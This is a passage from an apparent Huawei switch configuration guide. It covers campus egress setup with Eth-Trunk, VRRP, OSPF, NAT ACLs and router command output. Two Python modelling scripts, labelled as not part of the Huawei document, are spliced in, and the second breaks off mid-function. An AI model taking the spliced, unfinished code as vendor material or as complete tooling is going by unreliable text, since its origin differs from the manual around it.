18.3.1 Example for Configuring Local Port Mirroring (1:1 Mirroring).........................................................................1431
18.3.2 Example for Configuring Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured One by One)................................................................................................................................................................................ 1433
18.3.3 Example for Configuring Local Port Mirroring (1:N Mirroring in Which Observing Ports Are Configured in a Batch)..............................................................................................................................................................................1437
18.3.4 Example for Configuring Local Port Mirroring (N:1 Mirroring)........................................................................1440
18.3.5 Example for Configuring Local Port Mirroring (M:N Mirroring)...................................................................... 1443
18.3.6 Example for Configuring Layer 2 Remote Port Mirroring..................................................................................1446
18.3.7 Example for Configuring MQC-based Local Traffic Mirroring......................................................................... 1449
18.3.8 Example for Configuring ACL-based Local Traffic Mirroring...........................................................................1453
18.3.9 Example for Configuring MQC-based Remote Traffic Mirroring...................................................................... 1456
18.3.10 Example for Configuring ACL-based Remote Traffic Mirroring..................................................................... 1460
18.4 Typical iPCA Configuration................................................................................................................................... 1465
18.4.1 Example for Configuring iPCA to Implement End-to-End Packet Loss Measurement......................................1465
18.4.2 Example for Configuring iPCA to Implement Regional Network Packet Loss Measurement........................... 1469
18.4.3 Example for Configuring iPCA to Implement Hop-by-Hop Packet Loss Measurement.................................... 1475
18.4.4 Example for Configuring iPCA to Implement Packet Loss Measurement on a Direct Link.............................. 1480
18.4.5 Example for Configuring iPCA to Implement Packet Loss Measurement on a Device..................................... 1483

19 Typical Configuration for Interconnection Between Switches and IP Phones.........1486


19.1 Basic Concepts....................................................................................................................................................... 1488
19.2 IP Phone Deployment............................................................................................................................................. 1489
19.3 Typical Configuration Methods for Interconnection Between Switches and IP Phones........................................1490
19.4 Example for Connecting IP Phones to Switches Through LLDP.......................................................................... 1491
19.5 Example for Connecting IP Phones to Switches Through the MED TLV............................................................. 1502
19.6 Example for Connecting Cisco IP Phones to Switches Using HDP.......................................................................1510
19.7 Example for Connecting an IP Phone to a Switch Through the DHCP Server......................................................1521
19.8 Example for Connecting IP Phones to Switches Through MAC Address-based Assignment...............................1524
19.9 Example for Connecting IP Phones to Switches Through the OUI-based voice VLAN....................................... 1528
19.10 Example for Connecting IP Phones to Switches Through the PVID of the Voice VLAN ID..............................1541
19.11 Example for Connecting IP Phones to Switches Through an ACL......................................................................1552
19.12 Example for Connecting IP Phones to Switches Through a Simplified ACL......................................................1564
19.13 Example for Connecting IP Phones to Switches Through NAC Authentication and Voice VLAN.................... 1577

20 Typical Free Mobility and Service Chaining Configuration........................................ 1582


20.1 Example for Configuring a Service Chain to Guide Data Flow Forwarding......................................................... 1583
20.2 Example for Deploying the Free Mobility Function for Users' Physical Location Change (V200R006C00, V200R007C00, V200R008C00).................................................................................................................................... 1594
20.3 Example for Deploying the Free Mobility Function for Users' Physical Location Change (V200R007C20 and V200R009C00)......................................................................................................................................... 1611

21 Typical SVF Configuration .................................................................................................1629


21.1 Information to Know Before You Deploy an SVF System.................................................................................... 1630
21.1.1 SVF Technical Characteristics.............................................................................................................................1630
21.1.2 SVF Application Scenarios................................................................................................................................. 1631
21.1.3 SVF Service Deployment Limitations.................................................................................................................1635
21.2 SVF System Planning............................................................................................................................................. 1637
21.2.1 Planning SVF System Networking......................................................................................................................1637
21.2.2 Planning Member Devices of an SVF System.................................................................................................... 1641
21.3 AS Service Configuration.......................................................................................................................................1643
21.3.1 Access User Network Partitioning Configuration............................................................................................... 1645
21.3.2 Access User Authentication Configuration......................................................................................................... 1645
21.3.3 Security Configuration........................................................................................................................................ 1651
21.4 Example for Configuring SVF............................................................................................................................... 1654
21.5 Example for Configuring the Access Layer for a Wired Campus Network Using eSight..................................... 1668

22 Typical NGFW Module Configuration............................................................................. 1679


22.1 Layer-2 Dual-NGFW Module Deployment, Switch CSS, and Redirection-based Traffic Diversion....................1680
22.2 Layer-3 Dual-NGFW Module Deployment, Switch CSS, and Static Route Traffic Diversion............................. 1692
22.3 Layer-3 Dual-NGFW Module Deployment, Switch CSS, and PBR-based Traffic Diversion............................... 1707
22.4 Layer-3 Dual-NGFW Module Deployment, Switch CSS, and VLAN-based Traffic Diversion........................... 1721

1 Use the Quick Search Tool

Click Tools to obtain more documentation tools.

Switch Hardware Query Tool

This tool helps you to quickly query hardware information of switches. You do not need to
register a Huawei account before using this tool.

Product Feature Query Tool

This tool helps you query the features supported on enterprise networking products such as
switches and routers. You do not need to register a Huawei account before using this tool.

Command Query Tool

This tool shows details about commands used on switches. You do not need to register a
Huawei account before using this tool.

Alarm Query Tool

This tool shows details about alarms used on switches. You do not need to register a Huawei
account before using this tool.

2 Comprehensive configuration example

About This Chapter

2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus or
Branch Networks
2.2 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected
to Core Switches in In-line Mode)
2.3 Example for Configuring the Egress of a Large-scale Campus (Firewalls Are Connected
to Core Switches in Bypass Mode)
2.4 Example for Configuring an Agile Campus Network
2.5 Example for Configuring High-Speed Self Recovery on a Subway Bearer Network
2.6 Example for Configuring ACU2 and NGFW on Switches


2.1 Example for Configuring Egress Devices for Small- and Medium-Scale Campus or Branch Networks

Campus Network Egress Overview
A campus network egress is often located between an enterprise's internal network and
external network to provide the only ingress and egress for data traffic between the internal
and external networks. Small- and medium-scale enterprises want to deploy multiple types of
services on the same device to reduce initial investment on enterprise network construction
and long-term O&M cost. Enterprise network users require access to the Internet and virtual
private networks (VPNs). To reduce network construction and maintenance costs, small- and
medium-scale enterprises often lease the Internet links of carriers to build VPNs. Some
campus networks requiring high reliability often deploy two egress routers to implement
device-level reliability and use reliability techniques such as link aggregation, Virtual Router
Redundancy Protocol (VRRP), and active and standby routes to ensure campus network
egress reliability. Huawei AR series routers can be used as egress devices and work with
Huawei S series switches to provide a cost-effective network solution for small- and medium-
scale campus networks. Campus network egress devices must provide the following
functions:
l Provide the network address translation (NAT) outbound and NAT server functions to
translate between private and public network addresses, so that internal users can access
the Internet and Internet users can access internal servers.
l Support the construction of VPNs through the Internet so that branches of the enterprise
can communicate over VPNs.
l Encrypt data to protect data integrity and confidentiality, ensuring service transmission
security.
l Egress devices of small- and medium-scale campus networks must be reliable, secure,
low-cost, and easy to maintain.

Configuration Notes
l This configuration example applies to small- and medium-scale enterprise campus/
branch egress solutions.
l This configuration example provides only the enterprise network egress configuration.
For the internal network configuration, see "Small- and Mid-Sized Campus Networks" in
the HUAWEI S Series Campus Switches Quick Configuration.

Networking Requirements
The headquarters and branch of an enterprise are located in different cities and far from each
other. The headquarters has two departments (A and B), and the branch has only one
department. A cross-regional enterprise campus network needs to be constructed to meet the
following requirements:
l Both users in the headquarters and branch have access to the Internet. In the
headquarters, users in Department A can access the Internet, but users in Department B
are not allowed to access the Internet. In the branch, all users can access the Internet.
l The headquarters has a web server to provide WWW service so that external users can
access the internal server.


l The headquarters and branch need to communicate through VPNs over the Internet and
communication contents must be protected.
l The headquarters' campus network egress requires link-level reliability and device-level
reliability.
l The branch does not need high reliability.

Solution Overview
A comprehensive configuration solution, as shown in Figure 2-1, is provided to meet the
preceding requirements. The solution adopts a multi-layer, modular, redundant, and secure
design and applies to small- and medium-scale enterprise or branch campus networks.


Figure 2-1 Configuring egress devices for small- and medium-scale campus networks or branch networks

[Figure not reproduced. It shows the enterprise headquarters (access switches ACC1 for Department A in VLAN 10 and ACC2 for Department B in VLAN 20, the CORE stack with the web server on GE0/0/5, and egress routers RouterA and RouterB running VRRP VRID 1 and OSPF Area 0 over Eth-Trunk links), the enterprise branch (SwitchA and RouterC), and the carrier routers RouterD and RouterE on the Internet.]

l Deploy Huawei S2700&S3700 switches (ACC1, ACC2, and SwitchA) at the access
layer, deploy Huawei S5700 switches (CORE) at the core layer, and deploy Huawei
AR3200 routers (RouterA, RouterB, and RouterC) at the campus network egress.
l In the headquarters, use redundancy between two AR egress routers (RouterA and
RouterB) to ensure device-level reliability. In the branch, deploy one AR router as the
egress router.
l In the headquarters, set up a stack (CORE) between two S5700 core switches to ensure
device-level reliability.
l In the headquarters, deploy Eth-Trunks between access switches, the CORE, and egress
routers to ensure device-level reliability.
l In the headquarters, assign a VLAN to each department and transmit services between
departments at Layer 3 through VLANIF interfaces of the CORE.
l Use the CORE of the headquarters as the gateway for users and servers, and deploy a
DHCP server to assign IP addresses to users.
l Deploy the gateway for branch users on the egress router.
l Deploy VRRP between the two egress routers of the headquarters to ensure reliability.
l Construct an Internet Protocol Security (IPSec) VPN between the headquarters and
branch over the Internet to enable communication while ensuring data transmission
security.
l Deploy Open Shortest Path First (OSPF) between the two egress routers and CORE of
the headquarters to advertise user routes for future capacity expansion and maintenance.

Configuration Roadmap
The configuration roadmap is as follows:

1. Deploy the headquarters and branch campus networks.
In the headquarters, deploy a stack and link aggregation, configure VLANs and IP
addresses for interfaces, and deploy a DHCP server to allow users in the headquarters
campus network to communicate. Users within a department communicate at Layer 2
through access switches, and users in different departments communicate at Layer 3
through the VLANIF interfaces of the CORE.
In the branch, configure VLANs and IP addresses for interfaces on access switches and
egress routers, and deploy a DHCP server to allow users in the branch campus network
to communicate.
2. Deploy VRRP.
To ensure reliability between the CORE and two egress routers of the headquarters,
deploy VRRP between the two egress routers so that VRRP heartbeat packets are
exchanged through the CORE. Configure RouterA as the master device and RouterB as
the backup device.
To prevent service interruption in the case of an uplink failure on RouterA, associate the
VRRP status with the uplink interface of RouterA. The association ensures a fast VRRP
switchover when the uplink fails.
3. Deploy routes.
To steer uplink traffic of devices, configure a default route with the VRRP virtual
address as the next hop on the CORE of the headquarters, and configure a default route
on each egress router of the headquarters and branch, with the next hop pointing to the IP
address of the connected carrier network device (public network gateway address).


To steer the return traffic of two egress routers of the headquarters, configure OSPF
between the two egress routers and CORE, and advertise all user network segments on
the CORE into OSPF and then to the two egress routers.
On RouterD, to steer traffic generated by access to the web server from external
networks, configure two static routes of which the destination address is the public
network address of the web server and next-hop addresses are uplink interface addresses
of the two egress routers. To ensure simultaneous route switchover and VRRP
switchover, set the route with next hop pointing to RouterA as the preferred one. When
this route fails, the route with next hop pointing to RouterB takes effect.
4. Configure NAT outbound.
To enable internal users to access the Internet, configure NAT on the uplink interfaces of
the two egress routers for translation between private network addresses and public
network addresses. Use an ACL to permit the source IP address of packets from
Department A so that users in Department A can access the Internet while users in
Department B cannot.
5. Configure a NAT server.
To enable external users to access the internal web server, configure a NAT server on the
uplink interfaces of the two egress routers to translate between the public and private
network addresses of the server.
6. Deploy IPSec VPN.
To enable users in the headquarters and branch to communicate through a VPN,
configure IPSec VPN between the egress routers of the headquarters and branch for
secure communication.

NOTE

For the enterprise internal network configuration, see "Small- and Mid-Sized Campus Networks" in the
HUAWEI S Series Campus Switches Quick Configuration.

Data Plan
Table 2-1, Table 2-2, and Table 2-3 provide the data plan.

Table 2-1 Data plan for link aggregation of interfaces

Device | LAG Interface | Physical Interfaces
RouterA | Eth-Trunk1 | GE2/0/0, GE2/0/1
RouterB | Eth-Trunk1 | GE2/0/0, GE2/0/1
CORE | Eth-Trunk1 | GE0/0/1, GE1/0/1
CORE | Eth-Trunk2 | GE0/0/2, GE1/0/2
CORE | Eth-Trunk3 | GE0/0/3, GE1/0/3
CORE | Eth-Trunk4 | GE0/0/4, GE1/0/4
ACC1 | Eth-Trunk1 | GE0/0/1, GE0/0/2
ACC2 | Eth-Trunk1 | GE0/0/1, GE0/0/2

NOTE

All Eth-Trunk interfaces work in Link Aggregation Control Protocol (LACP) mode.

Table 2-2 VLAN plan

Device | Data | Remarks
RouterA | Eth-Trunk1.100: Configure a dot1q termination sub-interface to terminate packets of VLAN 100. | Connects to the CORE of the headquarters.
RouterB | Eth-Trunk1.100: Configure a dot1q termination sub-interface to terminate packets of VLAN 100. | Connects to the CORE of the headquarters.
CORE | Eth-Trunk1: a trunk interface that transparently transmits packets of VLAN 10. | Connects to Department A of the headquarters.
CORE | Eth-Trunk2: a trunk interface that transparently transmits packets of VLAN 20. | Connects to Department B of the headquarters.
CORE | GE0/0/5: an access interface with VLAN 30 as the default VLAN. | Connects to the web server of the headquarters.
CORE | Eth-Trunk3: a trunk interface that transparently transmits packets of VLAN 100. | Connects to RouterA of the headquarters.
CORE | Eth-Trunk4: a trunk interface that transparently transmits packets of VLAN 100. | Connects to RouterB of the headquarters.
ACC1 | Eth-Trunk1: a trunk interface that transparently transmits packets of VLAN 10. | Connects to the CORE of the headquarters.
ACC1 | Ethernet0/0/2: an access interface with VLAN 10 as the default VLAN. | Connects to PC1 in Department A.
ACC2 | Eth-Trunk1: a trunk interface that transparently transmits packets of VLAN 20. | Connects to the CORE of the headquarters.
ACC2 | Ethernet0/0/2: an access interface with VLAN 20 as the default VLAN. | Connects to PC3 in Department B.
RouterC | GE2/0/0.200: Configure a dot1q termination sub-interface to terminate packets of VLAN 200. | Connects to SwitchA (access switch) of the branch.
SwitchA | GE0/0/1: a trunk interface that transparently transmits packets of VLAN 200. | Connects to RouterC (egress router) of the branch.
SwitchA | Ethernet0/0/2: an access interface with VLAN 200 as the default VLAN. | Connects to PC5 in the branch.

Table 2-3 IP address plan

Device | Data | Remarks
RouterA | GE1/0/0: 202.10.1.2/24; Eth-Trunk1.100: 10.10.100.2/24 | GE1/0/0 connects to the carrier network. Eth-Trunk1.100 connects to the CORE of the headquarters.
RouterB | GE1/0/0: 202.10.2.2/24; Eth-Trunk1.100: 10.10.100.3/24 | -
CORE | VLANIF 10: 10.10.10.1/24; VLANIF 20: 10.10.20.1/24; VLANIF 30: 10.10.30.1/24; VLANIF 100: 10.10.100.4/24 | VLANIF 10 functions as the user gateway of Department A. VLANIF 20 functions as the user gateway of Department B. VLANIF 30 functions as the gateway of the web server. VLANIF 100 connects to the egress routers.
Web server | IP address: 10.10.30.2/24; Default gateway: 10.10.30.1 | Public network IP address translated by the NAT server: 202.10.100.3
PC1 | IP address: 10.10.10.2/24; Default gateway: 10.10.10.1 | IP address 10.10.10.2/24 is allocated to the PC through DHCP in this example.
PC3 | IP address: 10.10.20.2/24; Default gateway: 10.10.20.1 | IP address 10.10.20.2/24 is allocated to the PC through DHCP in this example.
RouterD | InterfaceB: interface number GigabitEthernet1/0/0 and IP address 202.10.1.1/24; InterfaceC: interface number GigabitEthernet2/0/0 and IP address 202.10.2.1/24 | RouterD is a carrier network device. The interface numbers used here are examples. When configuring a device, use the actual interface numbers.
RouterE | InterfaceA: interface number GigabitEthernet1/0/0 and IP address 203.10.1.1/24 | RouterE is a carrier network device. The interface number used here is an example. When configuring a device, use the actual interface number.
RouterC | GE1/0/0: 203.10.1.2/24; GE2/0/0.200: 10.10.200.1/24 | -
PC5 | IP address: 10.10.200.2/24; Default gateway: 10.10.200.1 | IP address 10.10.200.2/24 is allocated to the PC through DHCP in this example.

Procedure
Step 1 Configure Eth-Trunks between the CORE and two egress routers of the headquarters.
# Configure the CORE.


<HUAWEI> system-view
[HUAWEI] sysname CORE
[CORE] interface eth-trunk 3
[CORE-Eth-Trunk3] mode lacp
[CORE-Eth-Trunk3] quit
[CORE] interface eth-trunk 4
[CORE-Eth-Trunk4] mode lacp
[CORE-Eth-Trunk4] quit
[CORE] interface gigabitethernet 0/0/3
[CORE-GigabitEthernet0/0/3] eth-trunk 3
[CORE-GigabitEthernet0/0/3] quit
[CORE] interface gigabitethernet 1/0/3
[CORE-GigabitEthernet1/0/3] eth-trunk 3
[CORE-GigabitEthernet1/0/3] quit
[CORE] interface gigabitethernet 0/0/4
[CORE-GigabitEthernet0/0/4] eth-trunk 4
[CORE-GigabitEthernet0/0/4] quit
[CORE] interface gigabitethernet 1/0/4
[CORE-GigabitEthernet1/0/4] eth-trunk 4
[CORE-GigabitEthernet1/0/4] quit

# Configure RouterA (egress router) of the headquarters. The configuration of RouterB is similar to that of RouterA.
<Huawei> system-view
[Huawei] sysname RouterA
[RouterA] interface eth-trunk 1
[RouterA-Eth-Trunk1] undo portswitch
[RouterA-Eth-Trunk1] mode lacp-static
[RouterA-Eth-Trunk1] quit
[RouterA] interface gigabitethernet 2/0/0
[RouterA-GigabitEthernet2/0/0] eth-trunk 1
[RouterA-GigabitEthernet2/0/0] quit
[RouterA] interface gigabitethernet 2/0/1
[RouterA-GigabitEthernet2/0/1] eth-trunk 1
[RouterA-GigabitEthernet2/0/1] quit

Step 2 Configure VLANs and IP addresses for interfaces.


# Configure the CORE.
[CORE] vlan 100
[CORE] quit
[CORE] interface Eth-Trunk 3
[CORE-Eth-Trunk3] port link-type trunk
[CORE-Eth-Trunk3] port trunk allow-pass vlan 100
[CORE-Eth-Trunk3] quit
[CORE] interface Eth-Trunk 4
[CORE-Eth-Trunk4] port link-type trunk
[CORE-Eth-Trunk4] port trunk allow-pass vlan 100
[CORE-Eth-Trunk4] quit
[CORE] interface vlanif 100
[CORE-Vlanif100] ip address 10.10.100.4 24
[CORE-Vlanif100] quit

# Configure RouterA (egress router) of the headquarters. The configuration of RouterB is similar to that of RouterA.
[RouterA] interface Eth-Trunk 1.100
[RouterA-Eth-Trunk1.100] ip address 10.10.100.2 24
[RouterA-Eth-Trunk1.100] dot1q termination vid 100
[RouterA-Eth-Trunk1.100] arp broadcast enable //Enable the interface to process ARP broadcast packets. This function is enabled by default on AR3200 series routers running V200R003C01 and later versions.
[RouterA-Eth-Trunk1.100] quit
[RouterA] interface gigabitethernet 1/0/0
[RouterA-GigabitEthernet1/0/0] ip address 202.10.1.2 24
[RouterA-GigabitEthernet1/0/0] quit

# Configure RouterC (egress router) of the branch.


<Huawei> system-view
[Huawei] sysname RouterC
[RouterC] interface gigabitethernet 1/0/0
[RouterC-GigabitEthernet1/0/0] ip address 203.10.1.2 24
[RouterC-GigabitEthernet1/0/0] quit

Step 3 Deploy VRRP. Configure VRRP between RouterA and RouterB of the headquarters, and
configure RouterA as the master device and RouterB as the backup device.
# Configure RouterA.
[RouterA] interface Eth-Trunk 1.100
[RouterA-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.100.1
[RouterA-Eth-Trunk1.100] vrrp vrid 1 priority 120
[RouterA-Eth-Trunk1.100] vrrp vrid 1 track interface GigabitEthernet1/0/0 reduced 40
[RouterA-Eth-Trunk1.100] quit
//To prevent service interruption in the case of an uplink failure on RouterA,
associate the VRRP status with the uplink interface of RouterA. The association
ensures a fast VRRP switchover when the uplink fails.

# Configure RouterB.
[RouterB] interface Eth-Trunk 1.100
[RouterB-Eth-Trunk1.100] vrrp vrid 1 virtual-ip 10.10.100.1
[RouterB-Eth-Trunk1.100] quit

After the configuration is complete, a VRRP group should have been set up between RouterA
and RouterB. You can run the display vrrp command to view the VRRP status of the two
egress routers.
# Check that the VRRP status of RouterA is Master.
[RouterA] display vrrp
Eth-Trunk1.100 | Virtual Router 1
State : Master
Virtual IP : 10.10.100.1
Master IP : 10.10.100.2
PriorityRun : 120
PriorityConfig : 120
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Track IF : GigabitEthernet1/0/0 Priority reduced : 40
IF state : UP
Create time : 2015-05-18 06:53:47 UTC-05:13
Last change time : 2015-05-18 06:54:14 UTC-05:13

# Check that the VRRP status of RouterB is Backup.
[RouterB] display vrrp
Eth-Trunk1.100 | Virtual Router 1
State : Backup
Virtual IP : 10.10.100.1
Master IP : 10.10.100.2
PriorityRun : 100
PriorityConfig : 100
MasterPriority : 120
Preempt : YES Delay Time : 0 s
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Config type : normal-vrrp
Backup-forward : disabled
Create time : 2015-05-18 06:53:52 UTC-05:13
Last change time : 2015-05-18 06:57:12 UTC-05:13

Step 4 Deploy routes.


1. Configure default routes to steer uplink traffic of devices.
# Configure a default route with the VRRP virtual address as the next hop on the CORE.
[CORE] ip route-static 0.0.0.0 0.0.0.0 10.10.100.1

# Configure a default route on each egress router of the headquarters and branch, with
the next hop pointing to the IP address of the connected carrier network device (public
network gateway address).
[RouterA] ip route-static 0.0.0.0 0.0.0.0 202.10.1.1
[RouterB] ip route-static 0.0.0.0 0.0.0.0 202.10.2.1
[RouterC] ip route-static 0.0.0.0 0.0.0.0 203.10.1.1

2. Deploy OSPF. Configure OSPF between two egress routers (RouterA and RouterB) and
CORE of the headquarters so that the two egress routers can learn return routes from
user network segments.
# Configure RouterA (egress router) of the headquarters.
[RouterA] ospf 1 router-id 10.1.1.1
[RouterA-ospf-1] area 0
[RouterA-ospf-1-area-0.0.0.0] network 10.10.100.0 0.0.0.255
[RouterA-ospf-1-area-0.0.0.0] quit

# Configure RouterB (egress router) of the headquarters.


[RouterB] ospf 1 router-id 10.2.2.2
[RouterB-ospf-1] area 0
[RouterB-ospf-1-area-0.0.0.0] network 10.10.100.0 0.0.0.255
[RouterB-ospf-1-area-0.0.0.0] quit

# Configure the CORE.


[CORE] ospf 1 router-id 10.3.3.3
[CORE-ospf-1] area 0
[CORE-ospf-1-area-0.0.0.0] network 10.10.100.0 0.0.0.255
[CORE-ospf-1-area-0.0.0.0] network 10.10.10.0 0.0.0.255 //Advertise the
user network segment into OSPF.
[CORE-ospf-1-area-0.0.0.0] network 10.10.20.0 0.0.0.255 //Advertise the
user network segment into OSPF.
[CORE-ospf-1-area-0.0.0.0] network 10.10.30.0 0.0.0.255 //Advertise the
web server network segment into OSPF.
[CORE-ospf-1-area-0.0.0.0] quit

# After the configuration is complete, OSPF neighbor relationships should have been
established between the CORE, RouterA, and RouterB. You can run the display ospf peer
command to view the OSPF neighbor status. The following uses the display on the
CORE as an example. Both neighbors are in the Full state.
[CORE] display ospf peer

OSPF Process 1 with Router ID 10.3.3.3
Neighbors

Area 0.0.0.0 interface 10.10.100.4(Vlanif100)'s neighbors
Router ID: 10.1.1.1 Address: 10.10.100.2
State: Full Mode:Nbr is Slave Priority: 1
DR: 10.10.100.4 BDR: 10.10.100.3 MTU: 0
Dead timer due in 40 sec
Retrans timer interval: 5
Neighbor is up for 00:26:37
Authentication Sequence: [ 0 ]

Router ID: 10.2.2.2 Address: 10.10.100.3
State: Full Mode:Nbr is Slave Priority: 1
DR: 10.10.100.4 BDR: 10.10.100.3 MTU: 0
Dead timer due in 36 sec
Retrans timer interval: 5
Neighbor is up for 00:26:37
Authentication Sequence: [ 0 ]

3. Configure static routes (return routes) from external networks to the public network
address of the internal server.
# On RouterD, configure two static routes of which the destination address is the public
network address of the internal server and next-hop addresses are uplink interface
addresses of RouterA and RouterB. To ensure simultaneous route switchover and VRRP
switchover, set the route with next hop pointing to RouterA as the preferred one. When
this route fails, the route with next hop pointing to RouterB takes effect.
[RouterD] ip route-static 202.10.100.0 255.255.255.0 202.10.1.2 preference 40 //Set the route with next hop pointing to RouterA as the preferred route.
[RouterD] ip route-static 202.10.100.0 255.255.255.0 202.10.2.2

When the uplink of RouterA is interrupted, the following actions are triggered:
a. VRRP master/backup switchover between two egress routers (RouterA and
RouterB) is implemented through association between the VRRP status and uplink
interface status of the two egress routers.
b. Active/standby switchover between routes from the carrier router RouterD to the
internal server is implemented through the configuration of active and standby
routes on RouterD.
The two actions ensure that the VRRP master/backup switchover and active/standby
route switchover occur simultaneously when the uplink of RouterA is interrupted and
ensure reliability of the incoming and outgoing paths.
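The simultaneous switchover argued above depends on two numbers: the VRRP "reduced 40" on RouterA must push its running priority below RouterB's, and RouterD's preference-40 route must lose to the default-preference route via RouterB once its link is gone. The following Python model is an added example, not part of this Huawei document or its configuration; it takes the priorities and preferences from Steps 3 and 4 (assuming the Huawei defaults of 100 for VRRP priority and 60 for static-route preference), uses constructed link-state inputs, and checks that both roles move to RouterB together.

```python
"""Model of the VRRP/static-route failover designed in Steps 3 and 4.

Added example, not Huawei code. Links are named with constructed labels
such as "RouterA:GE1/0/0" (the RouterA-RouterD uplink); a label in the
down set means that link is down on both ends.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import List, Optional, Set, Tuple

VRRP_DEFAULT_PRIORITY = 100       # assumed Huawei default when none is set
STATIC_DEFAULT_PREFERENCE = 60    # assumed Huawei default for ip route-static


@dataclass
class VrrpRouter:
    name: str
    ip: str                                # interface IP on the VRRP segment
    priority: int = VRRP_DEFAULT_PRIORITY
    track_if: str = ""                     # "vrrp vrid 1 track interface ..."
    reduced: int = 0                       # "... reduced N"

    def running_priority(self, down_ifs: Set[str]) -> int:
        """PriorityRun: configured priority minus the reduction while tracked IF is down."""
        if self.track_if and self.track_if in down_ifs:
            return max(self.priority - self.reduced, 1)   # never below 1
        return self.priority


def vrrp_master(routers: List[VrrpRouter], down_ifs: Set[str]) -> str:
    """Highest running priority wins; equal priorities -> higher interface IP."""
    return max(routers, key=lambda r: (r.running_priority(down_ifs),
                                       int(IPv4Address(r.ip)))).name


def required_reduced(master: VrrpRouter, backup: VrrpRouter) -> int:
    """Smallest 'reduced' value that makes the backup win when the uplink fails."""
    return master.priority - backup.priority + 1


@dataclass
class StaticRoute:
    next_hop: str
    via_if: str                     # link RouterD reaches the next hop over
    preference: int = STATIC_DEFAULT_PREFERENCE


def active_route(routes: List[StaticRoute], down_ifs: Set[str]) -> Optional[str]:
    """Lowest preference among routes whose link is still up, else None."""
    usable = [r for r in routes if r.via_if not in down_ifs]
    return min(usable, key=lambda r: r.preference).next_hop if usable else None


# Headquarters VRRP group (Step 3) and RouterD's return routes (Step 4.3)
ROUTERS = [
    VrrpRouter("RouterA", "10.10.100.2", priority=120,
               track_if="RouterA:GE1/0/0", reduced=40),
    VrrpRouter("RouterB", "10.10.100.3"),
]
ROUTES = [
    StaticRoute("202.10.1.2", via_if="RouterA:GE1/0/0", preference=40),
    StaticRoute("202.10.2.2", via_if="RouterB:GE1/0/0"),
]


def failover_state(down_ifs: Set[str]) -> Tuple[str, Optional[str]]:
    """(VRRP master, RouterD next hop for 202.10.100.0/24) for a link state."""
    return vrrp_master(ROUTERS, down_ifs), active_route(ROUTES, down_ifs)


def switchovers_aligned(routers: List[VrrpRouter], routes: List[StaticRoute],
                        down_ifs: Set[str]) -> bool:
    """True when the VRRP master and RouterD's chosen return path are the same router."""
    master = vrrp_master(routers, down_ifs)
    hop = active_route(routes, down_ifs)
    return hop is not None and any(
        r.next_hop == hop and r.via_if.startswith(master + ":") for r in routes)


if __name__ == "__main__":
    print("all links up      :", failover_state(set()))
    print("RouterA uplink down:", failover_state({"RouterA:GE1/0/0"}))
    print("minimum reduced    :", required_reduced(ROUTERS[0], ROUTERS[1]))
```

A "reduced" value below 21 would leave RouterA as VRRP master while RouterD already returns traffic via RouterB, which is exactly the misalignment the last function detects.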
Step 5 Configure NAT outbound.
1. Define data flows for NAT translation on the egress routers of the headquarters and
branch.
In the headquarters, only users in Department A can access the Internet using source IP
address 10.10.10.0/24. In the branch, all users can access the Internet using source IP
address 10.10.200.0/24.
# Configure RouterA (egress router) of the headquarters. The configuration of RouterB
is similar to that of RouterA.
[RouterA] acl 3000
[RouterA-acl-adv-3000] rule 5 deny ip source 10.10.10.0 0.0.0.255 destination 10.10.200.0 0.0.0.255 //Configure an ACL to deny the data flow to be protected by IPSec.
[RouterA-acl-adv-3000] rule 10 deny ip source 10.10.20.0 0.0.0.255 destination 10.10.200.0 0.0.0.255 //Configure an ACL to deny the data flow to be protected by IPSec.
[RouterA-acl-adv-3000] rule 15 permit ip source 10.10.10.0 0.0.0.255 //Configure an ACL to permit the data flow for NAT translation.
[RouterA-acl-adv-3000] quit
//On Huawei AR3200 series routers, if IPSec and NAT are configured on the
same interface, NAT translation is performed first. To avoid performing NAT
translation on the data flows to be protected by IPSec, configure ACLs to be
referenced by NAT to deny the data flows to be protected by IPSec.


# Configure RouterC (egress router) of the branch.
[RouterC] acl 3000
[RouterC-acl-adv-3000] rule 5 deny ip source 10.10.200.0 0.0.0.255 destination 10.10.10.0 0.0.0.255
[RouterC-acl-adv-3000] rule 10 deny ip source 10.10.200.0 0.0.0.255 destination 10.10.20.0 0.0.0.255
[RouterC-acl-adv-3000] rule 15 permit ip source 10.10.200.0 0.0.0.255
[RouterC-acl-adv-3000] quit
//Configure ACLs to be referenced by NAT to deny the data flows to be
protected by IPSec.

2. Configure NAT on the uplink interfaces of the egress routers of the headquarters and
branch.

# Configure RouterA. The configurations of RouterB and RouterC are similar to that of
RouterA.
[RouterA] interface GigabitEthernet1/0/0
[RouterA-GigabitEthernet1/0/0] nat outbound 3000
[RouterA-GigabitEthernet1/0/0] quit

3. Verify the configuration.

# After the configuration is complete, run the display nat outbound command to view
NAT configuration. The following uses the display on RouterA as an example.
[RouterA] display nat outbound
NAT Outbound Information:
--------------------------------------------------------------------------
Interface Acl Address-group/IP/Interface Type
--------------------------------------------------------------------------
GigabitEthernet1/0/0 3000 202.10.1.2 easyip
--------------------------------------------------------------------------
Total : 1
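The NAT-before-IPSec ordering noted in this step is what decides whether a branch-bound packet is translated or encrypted, and a missing deny rule in ACL 3000 would silently send VPN traffic to the Internet untranslated into the clear. The following Python model is an added example, not Huawei code; it reproduces first-match, rule-number-ordered advanced-ACL semantics with wildcard masks, loads ACL 3000 from this step and ACL 3001 from Step 7 (the IPSec ACL on RouterA), classifies constructed sample flows, and audits the pair of ACLs for exactly that ordering mistake.

```python
"""Model of the NAT/IPSec ACL interplay on RouterA's GE1/0/0 (Steps 5 and 7).

Added example, not Huawei code. Semantics modelled: rules are tried in
ascending rule-number order, the first match wins, an ACL with no matching
rule returns no match, and wildcard masks mark don't-care bits
(0.0.0.255 = /24). NAT outbound is evaluated before the IPSec policy on
the same interface, as the NOTE in Step 5 states.
"""
from dataclasses import dataclass
from ipaddress import IPv4Address
from typing import List, Optional, Tuple


def _wild_match(addr: str, base: str, wildcard: str) -> bool:
    """Huawei wildcard match: bits set in the wildcard are ignored."""
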